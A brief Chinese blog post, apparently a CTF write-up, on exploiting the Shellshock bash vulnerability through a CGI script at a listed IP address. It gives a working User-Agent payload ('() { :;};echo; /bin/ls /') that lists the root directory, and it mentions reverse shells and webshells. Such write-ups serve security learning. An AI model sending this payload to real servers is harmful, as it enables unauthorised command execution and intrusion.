标签:shel 命令执行漏洞 bsh 下载 ash 命令 echo gen 拼接
今天,刷到一道题,bash远程解析命令执行漏洞,
尝试拼接,访问关键文件成功
http://219.153.49.228:43684/cgi-bin/poc.cgi
抓包修改user-Agent,进行利用
() { :;};echo; /bin/ls /
() { :;}; 解释特殊变量时进行结束并执行后面的shell
这样就在根目录下 拿到 key.txt文件了,修改下shell就可以查看key.txt文件内容
另外也可以尝试下反弹shell,直接执行或者远程下载bash类型的反弹shell文件,拿到webshell
标签:shel 命令执行漏洞 bsh 下载 ash 命令 echo gen 拼接
原文地址:https://blog.51cto.com/13854262/2499165
